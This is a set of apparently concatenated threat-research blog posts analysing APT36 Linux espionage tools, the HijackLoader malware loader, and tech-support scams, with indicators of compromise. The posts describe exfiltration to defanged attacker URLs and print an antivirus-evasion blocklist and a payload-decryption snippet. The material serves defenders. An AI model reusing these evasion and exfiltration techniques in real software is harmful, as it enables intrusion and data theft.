A quick technical analysis determined these Linux payloads as Mythic Poseidon binaries. Since Mythic is an open-source framework that is well-documented on GitHub, we will not explore its technical details in this blog.
The corresponding C2 servers extracted from each malicious Linux payload are listed below.
Table 2: C2 servers from malicious Linux payload
C2 IP ADDRESS
PORT
108.61.163[.]195
7443
64.176.40[.]100
7443
The C2 panel for Mythic Poseidon can be accessed by visiting the URI path /new/login on the server running at port 7443.
For instance, the C2 panel for 108.61.163[.]195 can be accessed at hxxps://108.61.163[.]195:7443/new/login .
Figure 9: The Mythic C2 panel for the Poseidon binary.
New Python-Based Cyber Espionage Utilities Targeting Linux
During our analysis, we also discovered new Python-based ELF binaries used by APT36 for the purpose of cyber espionage. These binaries target the Linux environment in the Indian government organizations and are named to seem like legitimate Linux system services.
In this section, we review two types of cyber espionage tools discovered by our research team.
GLOBSHELL - Custom-built File exfiltration Linux utility
The espionage tool under analysis includes this metadata:
MD5 hash: 3c3c9303ae33f3bae2e139dbb1db838e
Filename: rcu-tasks-kthread
This ELF binary was compiled using PyInstaller. We extracted the decompiled Python code to understand its functionality. The image below shows the decompiled code.
Figure 10: The decompiled code of Python-based cyber espionage tool type 1.
These are the key operations performed by this script:
The script contains a predefined list of file extensions which are scanned for in the /media directory recursively. The list of file extensions includes various types like image files, MS Office files, LibreOffice, and PDF.
Once the list of files is built, it copies the files to a hidden directory in the path: ~/.config/bossconfig/usnconfig/
The content inside this directory is archived into a ZIP file called usnconfig.zip .
Data is exfiltrated to the URL hxxp://baseuploads[.]com/myf/test.php in an HTTP POST request. Along with the ZIP file, the machine's username, hostname, and the current timestamp are sent.
We found another ELF binary called mm-precpu-wq with the same functionality as the ELF binary discussed above. However, this binary included a more in-depth predefined list of file extensions and file paths which it scans to exfiltrate files. In addition to the /media directory, this binary also searches the following paths:
/home/{user}/Downloads/**/
/home/{user}/Documents/**/
/home/{user}/Desktop/**/
/home/{user}/Pictures/**/
/home/{user}/.local/share/Trash/**/
PYSHELLFOX - Custom-built Firefox session stealing Linux utility
The second type of cyber espionage tool we discovered steals the Firefox browser session details of the user if the user has a browser tab open with any of the following titles or URLs:
email.gov.in/#
inbox
web.whatsapp.com
As is evident from this list, the threat actor is interested in exfiltrating the user's Indian government inbox details as well as WhatsApp conversations.
The image below shows the relevant code section which does this.
Figure 11: The decompiled code Python-based cyber espionage tool type 2.
The espionage tool under analysis includes this metadata:
MD5 hash: c86f9ef23b6bb200fc3c0d9d45f0eb4d
Filename: events-highpri
These are the key operations performed by this script:
Fetches the list of all the live Firefox sessions by scanning the path .mozilla/firefox/*default*/sessionstore-backups/recovery.js* .
For each file on the list, the code locates the file containing the magic bytes, mozLz40\x00, as the first 8 bytes.
Uses LZ4 decompression to extract the JSON data from the magic bytes file. This JSON data has details about the windows and tabs in the current live Firefox session.
Iterates over every tab in every Firefox window, extracting the title and the URL from each tab. Then, the code checks if they match any value in the predefined list mentioned earlier.
If and when it finds a match, the code archives the ~/.mozilla/firefox directory content into the /dev/shm/firefox.zip ZIP archive.
Uploads the ZIP archive to hxxp://baseuploads[.]com/myf/test.php in an HTTP POST request. In addition to uploading the data, the code also uploads the username, hostname, and current timestamp.
Reasons for New Linux-Based Attack Vectors
Why is APT36 suddenly adding new attack vectors for the Linux environment?
Historic and widespread usage of Linux in the Indian government sector: Linux-based operating systems are widely used in the Indian government sector. The Debian-based operating system, BOSS (Bharat Online Software Solution), developed by CDAC is used across various state ministries and even the Indian defense forces. For more details about the usage of Linux Boss in India, visit the Ministry of Electronics & Information Technology.
Expanding into government-related verticals: The recent announcement by the Indian government introduces Maya OS, a Debian Linux-based operating system that will replace Microsoft Windows OS across government and defense sectors. Consequently, there is now a substantial incentive for APT36 and other nation-state threat actors, known for targeting India, to incorporate new attack vectors and Linux payloads into their arsenal. The ubiquitous use of Linux-based systems in more verticals means more potential victims.
Threat Attribution
We attribute these new Windows and Linux-based attacks to APT36 because their method of serving decoy PDF files, the metadata and their Linux commands are almost identical to previous attacks, which are known and linked to APT36. In addition to this, there is also a C2 infrastructure overlap with previous APT36 attacks which we describe in more detail in the corresponding section.
Decoy PDF files
The decoy PDF file which is dropped in the same directory as the malicious DLL on the victim's machine by ElizaRAT. The metadata of this PDF file indicated the author as "Apolo Jones" and the PDF file itself was generated with Microsoft Office Word.
Both these indicators align with our technical analysis of APT36 from November of 2022.
In addition to this, the decoy PDF files downloaded from the attacker-controlled servers in the campaign targeting the Linux platform share the same metadata as well.
Linux commands
While the attack vector used to distribute the Linux payload is entirely new in this campaign, the Linux commands and file paths used in the desktop entry files share similarities with the previous APT36 campaign used to distribute Linux payloads.
In March 2023, APT36 used a Python-compiled ELF binary to target the Linux environment in the Indian government sector. You can read about it on the Uptycs blog.
By comparing the Linux commands used in the decompiled Python code in March 2023 and the Linux commands used in the latest desktop entry files (in August 2023), we can see a clear similarity.
The figure below shows a side-by-side comparison of the two.
Figure 12: A side-by-side comparison of Linux commands from the March 2023 and August 2023 campaigns executed by APT36.
Here is a list of similarities between both cases:
A hidden directory path structure is created in the location: ~/.local/share .
A short shell script responsible for rebooting the machine and executing the Linux payload is written to /dev/shm/ .
The same crontab command is executed.
The shell script is deleted.
The sequence of commands is similar.
Threat Actor Infrastructure
In the APT36 attacks observed since April 2023, the threat actor has taken extensive measures to conceal any connection to Pakistan by making it seem that the infrastructure is controlled by a threat actor in India. We assess, with a high-confidence, that this is not a coincidence but rather an intentional deception tactic used by APT36 to avoid the attacks from being attributed to Pakistan.
Registrant Country of C2 Domains
Beginning in June 2023, the threat actor started registering several domains on a server with the IP address 153.92.220.59. The IP address is related to the Hostinger ASN. This infrastructure was involved in the attacks distributing malicious Linux desktop entry files discussed earlier.
While the WHOIS information for all these domains is redacted, we can still see the registrant country. For most of the domains, the threat actor took sufficient measures to ensure the registrant country is India (IN). However, for one of the domains, admindesk[.]in, we can see the registrant country is PK (Pakistan).
The figure below shows examples of WHOIS information for two of the domains registered by the threat actor on the same infrastructure and used in the same attack.
Figure 13: A side-by-side comparison of the WHOIS info from two attacker-registered domains related to same campaign and infrastructure.
We believe this was an OPSEC mistake by the threat actor.
C2 Infrastructure Overlap
There is a C2 infrastructure overlap between the latest campaign and the previous instances of attacks by APT36.
In 2022, the server with IP address 153.92.220[.]48 was used to host the domains below which are registered by APT36:
Govscholarships[.]in
Kavach-apps[.]com
Kavach-app[.]in
Rodra[.]in
ksboard[.]in
In the latest instance, a server with IP address: 153.92.220[.]59 was used to host the C2 domains. Both the IP addresses belong to the same subnet: 153.92.220.0/24
These IP addresses belong to the ASN - AS 47583 (Hostinger) which has been abused by APT36 in the past.
Email Associated with Malicious Google Drive Links
ElizaRAT is distributed using malicious Google Drive links. Leveraging the Google Drive ID from the links, we gathered additional information about the owner of the Google Drive and the corresponding email address. The image below shows the information we retrieved.
Figure 14: A Google Drive link details revealing owner information.
The email address and owner name associated with the Google Drive link was:
Email address: [email protected]
Owner namer: "Nand Kishore"
Because “Nand Kishore” is a common name in India, the fake owner was added to implicate a threat actor from India, not Pakistan - where APT36 originates.
Attacker-Controlled Server IP Addresses
In a few instances, threat actors distributed malicious Linux desktop entry files where the embedded payloads were hosted on servers located in India. This tactic of using servers in the same region as the targeted country for mounting attacks is another deceptive technique employed by APT36.
Here is a list of the IP addresses of four servers hosting the malicious Linux payloads:
103.2.232[.]82
64.227.133[.]222
64.227.138[.]127
134.209.159[.]9
Top Level Domain (TLDs) of Malicious Domains
In all of the attacks we reviewed for this blog, the TLD was always set to .in - corresponding with the country of India. Another tactic used by APT36 in a few cases is to disguise bad URLs as official Indian government-related web addresses.
Conclusion
Our research team is actively monitoring the C2 infrastructure of APT36, which is used to register new domains that are used in attacks targeting the Linux environment. The infrastructure continues to be active at the time of this blog publication. We have included a comprehensive list of indicators of compromise (IOCs) at the end of this blog and we urge the research community to update their detection. We have also done a proactive responsible disclosure to the National Informatics Centre (NIC), India with IOC details and the associated threat intelligence.
APT36’s introduction of new file formats, new attack vectors, and a new backdoor to the arsenal suggests that they are actively updating their tactics, techniques, and procedures (TTPs). In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.
Zscaler Coverage
Zscaler's multilayered cloud security platform detects indicators at various levels.
Win32.RAT.ElizaRAT
Win64.RAT.ElizaRAT
Linux.Payload.GLOBSHELL
Linux.Payload.PYSHELLFOX
Linux.Backdoor.Mythic
The image below shows the sandbox detection for the new Windows RAT (ElizaRAT) used in the attack.
MITRE ATT&CK TTP Mapping
ID
TACTIC
TECHNIQUE
T1218.002
System Binary Proxy Execution: Control Panel
ElizaRAT is distributed in the form of Control Panel applet file format (cpl).
T1567.002
Exfiltration Over Web Service
ElizaRAT uses the Telegram API for C2 communication.
T1564.001
Hide Artifacts: Hidden Files and Directories
Linux desktop entry file downloads and drops binaries in hidden directories.
T1036
Masquerading: Match Legitimate Name or Location
Linux desktop entry file downloads and drops binaries in hidden directories.
T1027.001
Obfuscated Files or Information: Binary Padding
More than a million “#” characters are added to the Linux desktop entry file to inflate its file size and potentially bypass security scanning solutions.
Indicators of Compromise (IOCs)
Windows Platform
MD5 HASH
BINARY NAME
b14884744cf3f86f6bd5a87f6bcbed85
NotepadPlus.cpl
a37d9aa1e165b9dc6c4ff396a9df49aa
NotepadPlus.cpl
62ee540334236723136bf0fecfeb6311
NotepadPlus.cpl
b89990ec5fe9b5cef59f1cd690403a75
NotepadPlus.cpl
9cc4c6ca7826c0771cfbdf27b2bbb515
NotepadPlus.cpl
fc99daa2e1b47bae4be51e5e59aef1f0
AgendaMeeting.cpl
66a69bf967bb882e34b1c32081a9ccee
TextSource.cpl
a279035702edd9f2507b5ce5fa69c6d4
Agenda_Meeting.cpl
1741147a31526e23798a7a1b702ade36
Agenda_Meeting.rar
Linux Platform
Linux desktop config files and Poseidon binaries
MD5 HASH
BINARY NAME
65167974b397493fce320005916a13e9
approved_copy.desktop
574013c4a22ca2d8d8c76e65ef5e8059
approved_copy.desktop
36b19ca8737c63b9c9a3365ff4968ef5
Meeting_Agenda.zip
9c66f8c0c970822985600bed04e56434
Delegation_Saudi_Arabia.zip
f27a4968af4ed64baef8e086516e86ac
Delegation_Saudi_Arabia.desktop
98279047a7db080129e5ec84533822ef
pickle-help
248d4e6bb0f32afd7a1cfb975910235a
ziputils-help
Linux Python-compiled cyber espionage tools
MD5 HASH
BINARY NAME
3c3c9303ae33f3bae2e139dbb1db838e
rcu-tasks-kthread
7608c396f0dfb9eac8d88a7b5a7e04e4
mm-precpu-wq
c86f9ef23b6bb200fc3c0d9d45f0eb4d
events-highpri
6a2243837c71d8071523cc76b8d4af43
nm_applet
8e4f65d5d58fca38a6d66a1afb228f20
xdg-user_dirs
Attacker Infrastructure
The domains and URLs below are involved in the attacks used to target Linux environments with desktop entry files. Notice how all of them are using “.in” as the TLD.
admincell[.]in
admin-dept[.]in
coordbranch[.]in
adminbr[.]in
coordbr[.]in
admin-desk[.]in
admindesk[.]in
adminsec[.]in
admindept[.]in
admin-br[.]in
hxxps://email9ov[.]in/VISIT_OF_MEDICAL/
hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/
The domains and URLs below are related to the Python-based cyber espionage tools.
baseuploads[.]com
baseuploads[.]com/myf/test.php
indiauc[.]com
indiauc[.]com/myf/test.php
The URLs used to host the password-protected archive files distributing ElizaRAT:
hxxps://drive.google.com/uc?export=download&id=1SaBv9C5EJlXKCQQ_8Tlkl1cBJ9-9XN8u
hxxps://drive.google.com/uc?export=download&id=140KPyaNuYZgOhP3Q7sTQPZ6a-q6x5j-h
Tue, 12 Sep 2023 13:22:21 -0700Sudeep Singhhttps://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenalTechnical Analysis of HijackLoader
https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader
Introduction
HijackLoader is a new malware loader, which has grown in popularity over the past few months. Even though HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution since it uses a modular architecture, a feature that most loaders do not have. Based on our telemetry, we have observed HijackLoader being used to load different malware families such as Danabot, SystemBC and RedLine Stealer.
In this blog, we examine the inner workings of HighjackLoader, from its initialization to modular design to anti-analysis techniques.
Key Takeaways
- HijackLoader is a new malware loader that ThreatLabz first observed in July 2023.
- The loader is being leveraged to drop numerous malware families, including Danabot, SystemBC, and RedLine Stealer, amplifying its potential threat.
- HijackLoader utilizes syscalls to evade monitoring from security solutions, detects specific processes based on an embedded blocklist, and delays code execution at different stages.
- The malware uses embedded modules that facilitate flexible code injection and execution - a feature uncommon among traditional loaders.
Technical Analysis
The following sections describe each stage and component of HijackLoader. It should be noted that the analysis focuses on one of the many samples observed by ThreatLabz. As a result, certain parts of the analysis might differ from sample to sample (e.g. structure field offsets).
First Stage Loader
Initialization Phase
Upon execution, HijackLoader starts by executing a modified (hooked) function of the Windows C Runtime (CRT), which points to the entry point of the first stage.
During its initialization phase, the loader determines if the final payload has been embedded in the binary or if it needs to download it from an external server. To achieve this, HijackLoader includes an encrypted configuration, which stores information such as:
A DWORD hash value to detect the next stage (e.g., the ti module described later in the text) from the modules table.
Windows API hashes for dynamic loading.
An array of DWORDs, which are used to determine if the loader has to download the final payload. The offsets for these fields might differ from sample to sample.
Parameters for several Windows API functions. For example, the constant PAGE_EXECUTE_READWRITE (0x40) for VirtualProtect.
A DWORD seed value, which is used for deriving a string based on the compromised host’s username.
A DWORD value, which is used for validating the payload, when loaded from disk, by searching it in the payload’s data.
A DWORD value, which is used for detecting all blobs of the encrypted payload.
An offset for the payload URL (if any) along with an XOR key to decrypt it.
A blocklist of process name hashes (described later in Table 1).
The above configuration block is detected by using hardcoded offsets and then decrypted either with a bitwise XOR or ADD operation. The offsets for the configuration block detection (including the offset of the encryption key) might differ from sample to sample.
Anti-Analysis
The first stage includes a limited set of evasion techniques:
Dynamic loading of Windows API functions by leveraging a custom API hashing technique.
Performing an HTTP connectivity test to a legitimate website (e.g. mozilla.org). If a connection cannot be made, then HijackLoader does not proceed with the execution and enters an infinite loop until a connection is made.
Delaying of code execution at different stages.
The first stager checks for the presence of a set of running processes. Depending on which ones are present, it executes different functionality. In Table 1, we summarize the corresponding functionality for each process.
Table 1 - HijackLoader blocklist of processes
PROCESS NAME
PRODUCT NAME
DESCRIPTION
avastsvc
Avast Antivirus
Delay execution for 40 seconds.
avgsvc
AVG Internet Security
Delay execution for 40 seconds.
a2service
Emsisoft Anti-Malware
Skip the connectivity test.
wrsa
Webroot SecureAnywhere
Skip the connectivity test.
msmpeng
Microsoft Windows Defender
No behavioral code change.
Second Stage Loading
HijackLoader locates the payload of the second stage (i.e., the ti module) by following the steps below:
Parses the decrypted configuration block, which was obtained from the initialization phase. Then, HijackLoader locates the encrypted payload URL and decrypts it using a bitwise XOR operation.
Downloads the payload and validates it by checking for the presence of the signature (included in the configuration block) in its data. If the validation passes, it writes it to disk.
Searches for encrypted blobs using the second marker. Each marker represents the start of an encrypted blob along with the size of the blob (which is stored before each occurrence). Moreover, the XOR key is located after the offset of the first encrypted blob.
Once all encrypted blobs have been extracted, they are concatenated together and decrypted with the XOR key.
Finally, the decrypted payload is decompressed using the LZNT1 algorithm.
Pseudocode for this process is shown in Figure 1.
Figure 1: HijackLoader second stage code to download and execute payloads
The same procedure is followed when the payload is loaded from disk. The only difference is that HijackLoader uses an additional pattern (from the configuration block) for finding the start offset of the embedded payload (Figure 2).
Figure 2: HijackLoader second stage payload execution from a local file
The decrypted payload includes two components:
A modules table - This includes the HijackLoader modules along with their settings and the final payload (e.g. SystemBC).
Main shellcode and settings, or a list of optional files to use for DLL hijacking.
Next, the first stager needs to load and execute the next stage. This is accomplished by obtaining the file path of the DLL to patch (e.g. mshtml.dll) and a table for the modules of HijackLoader that is included in the decrypted payload.
Then, HijackLoader loads the specified DLL and locates the next stager (ti module) after searching for its hash (included in the configuration block) in the modules table. Lastly, it copies the module’s data into the code section of the legitimate DLL and executes it.
NOTE: The file paths and names of files that are written to disk by HijackLoader are generated based on the username of the compromised host.
Modules
HijackLoader’s modules assist with the code injection and execution process of the final payload. The table below shows the modules identified by ThreatLabz, along with the corresponding CRC32 values and functionality.
Table 2 - HijackLoader modules observed by ThreatLabz
CRC32
MODULE NAME
DESCRIPTION
0x78b783ca
AVDATA
Blocklist of security products’ process names. The blocklist includes the CRC32 value of each process name.
0x757c9405
ESAL
Clears out the shellcode data and executes the final payload.
0x6364a15b
ESAL64
64-bit version of the ESAL module.
0xe7794e15
ESLDR
Assists with code injection of the main instrumentation shellcode.
0x4fa01ac5
ESLDR64
64-bit version of ESLDR module.
0x93eb1cb1
ESWR
Clears out the shellcode data and executes the rshell module.
0x699d0c82
FIXED
Legitimate executable file (e.g., QQPCMgr), which is used for injecting code into its process.
0xfea2e0eb
LauncherLdr
Decrypts the stored modules table file from disk. We have only seen the 64-bit version of this module being included.
0xf4f141c2
LauncherLdr64
64-bit version of LauncherLdr module.
0x74984889
rshell
Relocates, parses and executes the final payload.
0x7b37e907
rshell64
64-bit version of rshell module.
0x3ee477f1
ti
Executed after the first stage. Performs code injection for other stages and modules.
0x2ab77db8
ti64
64-bit version of ti module.
0x4eace798
tinystub
Empty executable file, which is used for patching during the final payload execution process.
0xa1d724fc
tinyutilitymodule.dll
Overwrites the PE headers of a specified file with null bytes.
0x263596ba
tinyutilitymodule64.dll
64-bit version of tinyutilitymodule.dll module.
0x1ae7700a
Unknown
Unknown module. Not included in any of the observed binaries. Based on the analyzed code, we assess that it includes a file path along with an optional parameter. The current running file is copied into this new location and executed along with the specified parameter.
N/A
Main instrumentation shellcode
Shellcode injected into the specified target process from the ti module. This module is responsible for executing the final payload.
Moreover, each module has a structure that holds information such as:
Module name
Module offset in the table
Module size
Due to the quality of the code and because the rest of the structure fields are not being used, ThreatLabz was not able to identify the purpose for the rest of the structure members. However, ThreatLabz assesses that the following information might be included as well:
Module timestamp
Internal names (e.g., rLdr64 for the rshell module)
From the modules mentioned above, our analysis focused on the ti and the main instrumentation shellcode modules since these two implement the majority of the core functionality for HijackLoader.
TI module
Anti-Analysis
The anti-analysis techniques are the same as presented in the previous section, but there are two notable differences:
The developers have included the Heaven's gate technique.
The process blocklist remains the same but the code behavior is different as can be seen in Table 3.
Table 3 - Process blocklist in the HijackLoader ti module
PROCESS NAME
DESCRIPTION
avastsvc
Adds persistence by creating a shortcut (LNK) file and saving the current executable under a random filename in the Windows folder %AppData%. NOTE: A flag, which is set in the decrypted payload at offset 4 is required too.
Generates a random environment variable name with seed 0xE1ABD1C2 and a new random filename. This is used at a later stage for storing the modules table.
Writes to disk a legitimate executable file (the FIXED module) and uses it for code injection at a later stage.
avgsvc
Same as avastsvc
a2service
No behavioral code change.
wrsa
No behavioral code change.
msmpeng
No behavioral code change.
Execution Phase
The primary role of the ti module is to inject the main instrumentation module, which is responsible for loading the final stage.
The ti module executes the next stage by using one of the following methods:
Re-executes the initial file from a new location and parameter (if the module with the CRC32 value 0x1ae7700a exists).
Creates a new process (specified in the configuration), maps the hijacked file into it (e.g. mshtml), and injects the main instrumentation shellcode. In addition (depending on the configuration flags), it executes the FIXED module, which might be used later for code injection.
HijackLoader might include an additional set of files, which can be used for DLL hijacking. In this case, it writes them to disk along with the encrypted payload (from stage 1) and executes the hijacked executable.
Executes the ESLDR module, which injects the main instrumentation shellcode.
Main Instrumentation Module
The main instrumentation module contains the core functionality for loading and executing the final stage of the infection chain.
Anti-Analysis
The anti-analysis techniques remain the same with the previous aforementioned stages. However, one key difference is the deployment of the AVDATA module. The AVDATA module contains a set of process names and if any of them are detected then the code behavior might change. The process names observed by ThreatLabz and their CRC32 values are presented in the table below.
Table 4 - Process name blocklist in the HijackLoader AVDATA module
CRC32
PRODUCT NAME
PROCESS NAME
0xb02ef94
Avast Antivirus
avastsvc.exe
0xc0bfbba0
ESET Smart Security
ekrn.exe
0x40cb21d3
Kaspersky AntiVirus
avp.exe
0xc0fe273f
Symantec Event Manager
ccsvchst.exe
0x9e0539f6
Norton 360
n360.exe
0xe6ef3ab
Avira
avguard.exe
0x8e9e8add
AVG Internet Security
avgsvc.exe
0x923d5594
AVG Internet Security
avgui.exe
0xce1599c2
BitDefender AntiVirus
vsserv.exe
0x83ed98a3
BitDefender AntiVirus
epsecurityservice.exe
0xd50dea99
TrendMicro AntiVirus
coreserviceshell.exe
0x2fba3706
McAfee Antivirus
mcshield.exe
0x1235ed11
McAfee Antivirus
mctray.exe
0x3a39ba4
Norton Internet Security
nis.exe
0xe981e279
Norton Internet Security
ns.exe
0x19e8fad2
BitDefender Antivirus
bdagent.exe
0x5f1c2fc2
Trend Micro Security
uiseagnt.exe
0xc68b2fd8
ByteFence Anti-Malware
bytefence.exe
0xefba2118
McAfee Security Scan Plus
mcuicnt.exe
0xfeb42b97
Internet Security Essentials
vkise.exe
0x6274fa64
Comodo Internet Security
cis.exe
0x4420ef23
Malwarebytes Anti-Malware
mbam.exe
0x31c100e7
360 Safe Guard
zhudongfangyu.exe
0x219b199a
360 Total Security
360tray.exe
0x64760001
N/A
Unknown
0x27873423
N/A
Unknown
0x8bdc7f5b
N/A
Unknown
Each process block in the AVDATA module has the following structure:
struct avdata_process_block
{
unsigned int CRC32; // CRC32 value of process.
unsigned char Execution_Type; // Code execution method for the final payload.
unsigned char LNK_Persistence_Flag; // Adds persistence with an LNK shortcut file.
unsigned char unknown; // Not used.
unsigned char unknown_2; // Not used.
int BITS_Persistence_Flag; // Adds persistence by creating a BITS job.
int unknown_3; // Not used.
int unknown_4; // Not used.
int Injection_Type; // Defines what code injection method to use.
int overwrite_pe_headers_with_junk_Flag; // Used during module deployment.
};
Persistence
As described in the structure above, persistence on the compromised host is established via the following methods:
Creation of a BITS job, which points to the executable file.
Creation of a shortcut file (LNK) in the Windows Startup folder. The shortcut’s path is added in a new BITS job and points to the executable file.
Final payload decryption and execution
The embedded payload is decrypted using a bitwise XOR operation with the key being derived from the first 200 bytes. This can be easily represented in Python as follows:
enc_data = data[200:]
key = data[:200]
dec = bytearray()
for idx in range(0, len(enc_data), 4):
dec_int = struct.unpack("<L", enc_data[idx:idx+4])[0] ^ struct.unpack("<L",
key[idx%200:idx%200 + 4])[0]
dec.extend(dec_int.to_bytes((dec_int .bit_length() + 7) // 8, byteorder='little'))
HijackLoader’s shellcode then proceeds with the injection or direct execution of the decrypted payload. The technique the shellcode uses depends on a number of different factors such as the payload’s file type and a flag, which is stored in the settings and indicates the injection method to use. In the table below, we describe each case along with a description of the action taken.
Table 5 - HijackLoader Code Injection Methods
INJECTION TYPE
DESCRIPTION
DLL file type.
In the case of a DLL file type, the shellcode parses the PE file and leverages the ESLR module, which erases the shellcode data and executes directly the entry point of the DLL.
Code injection when the injection flag is set to 3 and PE relocation is required (Method 1).
Creates a process of the FIXED module and writes to disk a file, which includes various information such as:
Pointer to the address of the rshell module data.
Process and thread handles of the created process.
Pointer to the address of the final payload.
Then it executes the ESWR module, which injects the rshell module into the created process. As a result, the rshell module reads the written file and therefore the data of the final payload. After relocating and parsing the file, HijackLoader executes the final payload.
Code injection when the injection flag is set to 3 and PE relocation is required (Method 2).
Creates a process of the FIXED module, loads the tinystub module, and adds a new PE section to it.
The patched stub module is written to the disk. It is important to note that HijackLoader writes the data without including the “MZ” string. Instead, it delays the execution for a few seconds and then writes to the file the MZ signature byte-by-byte.
Finally, it proceeds with the execution of the final payload as described in the previous method.
Code injection when the injection flag is set to 3 and no PE relocation is required (Method 1).
The implementation is similar to the previous two cases. However, there are a few notable differences:
HijackLoader adds a new section in the final payload file. This new section has the rshell module.
In the case of a .NET file, HijackLoader creates an msbuild process instead of using the FIXED module.
The code searches for certain values in the rshell module and replaces them with the same values that are used in the file, which is written to disk (i.e., egg-hunting).
In order to evade detection by security products, it writes random data to the injected process.
Code injection when the injection flag is set to 3 and no PE relocation is required (Method 2).
Same code injection technique as with the previous case, but the data injection takes place with timing delays.
Code injection when the injection flag is set to 3 with a .NET PE file.
Creates an msbuild process, and injects the rshell module and the payload.
Searches for certain values in the rshell module and replaces them to point to the address of the decrypted payload along with the injection type and the payload size. NOTE: No file is written on disk.
Writes random data in the injected process.
Code injection when the injection flag is set to 4.
Creates an msbuild process and injects the rshell module and the payload.
Searches for certain values in the rshell module and replaces them to point to the address of the decrypted payload along with the injection type and the payload size. NOTE: No file is written on disk.
Writes random data in the injected process.
Conclusion
In summary, HijackLoader is a modular loader with evasion techniques, which provides a variety of loading options for malicious payloads. Moreover, it does not have any advanced features and the quality of the code is poor. However, considering the increasing popularity of HijackLoader, we expect code improvements and further usage from more threat actors, especially to fill the void left by Emotet and Qakbot.
In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.
Cloud Sandbox
Zscaler’s multilayered cloud security platform detects indicators related to HijackLoader at various levels.
Indicators of Compromise (IOCs)
Host Indicators
SHA256 Hash
DESCRIPTION
7bd39678ac3452bf55359b44c5192b79412ce61a82cd72eef88f91aba5792ee6
HijackLoader
6b1621bded06b082f83c731319c9deb2fdf751a4cec1d1b2b00ab9e75f4c29ca
HijackLoader
e67790b394f5238908fcc326a9db940b200d9b50cbb45f0bfa94038db50beeae
HijackLoader
693cace37b4b6fed2ca67906c7a4b1c11273110561a207a222aa4e62fb4a184a
HijackLoader
04c0a4f3b5f787a0c9fa8f6d8ef19e01097185dd1f2ba40ae4bbbeca9c3a1c72
HijackLoader
Network Indicators
IOC
DESCRIPTION
hxxps://www.4sync[.]com/web/directDownload/KFtZys
VO/4jBKM7R0.baa89a7b43a7b73227f22ae561718f7f
Payload URL, which HijackLoader uses to load Danabot.
hxxps://geupdate-service[.]bond/img/3344379399.png
Payload URL, which HijackLoader uses to load RedLine stealer.
References
"Fake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers" by Natalie Zargarov
Fri, 08 Sep 2023 08:59:08 -0700Nikolaos Pantazopouloshttps://www.zscaler.com/blogs/security-research/technical-analysis-hijackloaderRise in Tech-Support Scams Abusing Windows Action Center Notifications
https://www.zscaler.com/blogs/security-research/rise-tech-support-scams-abusing-windows-action-center-notifications
Introduction
The Zscaler ThreatLabz team recently observed a surge in tech-support scams, with a noteworthy focus on the utilization of Windows Action Center notifications to display misleading warning messages to users. While the majority of tech-support scams previously centered around counterfeit notifications related to Windows Defender, scammers have since expanded their tactics to include bogus web pages impersonating other security providers like McAfee and Avast.
Now, threat actors use pirated movie streaming websites and X (formerly Twitter) as conduits for directing users to fraudulent tech-support pages by using the Windows Action Center notifications to display fictitious warnings and alerts.
In this blog, we examine two tech-support campaigns and the tactics they employ to trick users into willingly accepting fraudulent notifications that go on to display multiple fake infection-related warnings.
Key Takeaways
Delayed Gratification Over Instant Joy: We observed tech-support scammers focusing on using the Windows Action Center notifications to push notifications, instead of the traditional immediate appearance of pop-ups.
Explicit Images as a Lure: Many tech-support scams post explicit images on social media platforms to solicit attention from potential victims.
Pirated Streaming Websites as Initial Vector
This campaign targets users visiting pirated movie streaming websites. When the user clicks Play to watch a video, they receive a pop-up asking them to allow or cancel notifications from the website in order to watch the video.
If a user chooses to allow notifications, the website’s domain is added to the “allowed” notifications in the web browser. This grants the website permission to push notifications to the user’s systems even when they are not active on the website.
In the screenshot below, we see websites that were added to the allowed list. On the right side of the screen, the Windows notifications slider displays the scam notifications pushed by the websites.
Figure 1: Ad redirector/scam serving websites added to the notification allowed list of the browser.
After a brief period of time, the user is bombarded with notifications with ad content, beginning with explicit advertisements followed by notifications saying their system is infected.
When the user clicks on a notification, a new screen appears playing alarming MP3 audio convincing them that the system is infected. The same screen asks users to call the Windows Support phone number so a technician can help them resolve the problem. Of course, these messages are fraudulent and will direct users to a scam center.
Figure 2: Tech-support scam page, which makes the page full-screen and disables keystrokes, effectively locking out users because they can’t minimize or close the page.
The user can’t close the page, minimize it, or right-click on the page because the tech-support scam page runs a JavaScript code which disables these features. This is depicted in the screenshot below.
Figure 3: Screenshot of JavaScript code disabling features.
This campaign is unique because fraudulent messages do not immediately appear on the infected system when the user hits Play - which has been observed in traditional tech support scam chains.
For this campaign, the threat actors want users to subscribe to the notification. After some time, the malicious redirects show up as a notification in the Windows Action Center.
Most of the campaigns we analyzed were hosted on Amazon CloudFront or DigitalOcean. Many of the URL variants hosted on DigitalOcean begin with a marine animal name.
Figure 4: URL patterns observed in this campaign.
This tech-support scam campaign primarily targeted users from Australia, Canada, Japan, and the United States.
Figure 5: Geographical targets of tech-support campaign.
Signature Hits
According to our monitoring, these signature hits indicate the number of daily users accessing tech-support scam websites.
Figure 6: Hits for tech-support Campaign July-Aug 2023.
X (formerly Twitter) as Initial Vector
We also observed social media platforms like X (formerly Twitter) being used to redirect users to tech-support scam pages. This is mainly accomplished by using fake profiles to post alluring or sensational content to attract users' attention.
In the screenshot below, you can see provocative images being posted from fake accounts.
Figure 7: Fake profiles posting sensationalized images on X (formerly Twitter)
Once a user clicks on the X (formerly Twitter) posts, they are redirected to a page where users are prompted to complete a fake “robot verification” process, which usually involves solving a captcha or interacting with checkboxes. This step is meant to create an illusion of authenticity.
Figure 8: A page asking a user to allow notifications and prove they are not a robot
Once the user solves the captcha and clicks to allow access, the website uses the permission to display unwanted notifications and bombard the user with frequent pop-ups using the Windows Action Center. These pop-ups claim that the user's device is compromised and requires a renewal of their antivirus subscription. This is depicted in the images below.
Figure 9: Unwanted pop-up windows
The objective of this campaign is usually to plant harmful or potentially malicious software. It is obvious that these pages are fake because they are not affiliated with any legitimate antivirus vendors.
Figure 10: A fraudulent tech support webpage that generates false alerts of computer infections.
Here are a few more examples where websites “detect” vulnerabilities in a user's system and warn them about potential virus infections if renewal is neglected. This is all a strategy to make the user panic and contact tech-support.
Figure 11: A deceptive Avast-themed webpage falsely indicating that the user's system is vulnerable to virus infections.
